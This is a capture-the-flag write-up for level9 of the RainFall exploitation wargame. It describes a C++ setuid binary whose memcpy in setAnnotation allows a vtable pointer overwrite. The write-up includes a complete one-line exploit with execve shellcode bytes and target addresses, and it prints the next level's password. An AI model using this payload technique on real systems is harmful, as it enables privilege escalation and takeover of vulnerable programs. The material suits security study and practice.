After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level9/level9
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 bonus0 users 6720 Mar  6  2016 level9
```

This challenge made me nervous a little bit. Most of the time I spent on `decompiling` the code and understanding how I exploit.

Internally it's C++ application with one class inside. Because of `operator+` virtual operator there is `vtable` inside. Also there is `memcpy` inside `setAnnotation` method which can be used to override `vtable` pointer.

Because in this binary inposible override stack so I will use `shellcode`.
>More info: http://shell-storm.org/shellcode/

Using `gdb` found memorry address which I will override - `0x804a00c`.

Payload should looks like:
(address #2 - points to shellcode) + (shellcode) + (payload) + (address #1 - points to address #1 )

Get already known shellcode - `http://shell-storm.org/shellcode/files/shellcode-575.php`

Exploit:
```
level9@RainFall:~$ ./level9 $(python -c "print '\x10\xA0\x04\x08' + '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80' + 'A' * 83 + '\x0C\xA0\x04\x08' ")
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
```

Flag: `f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728`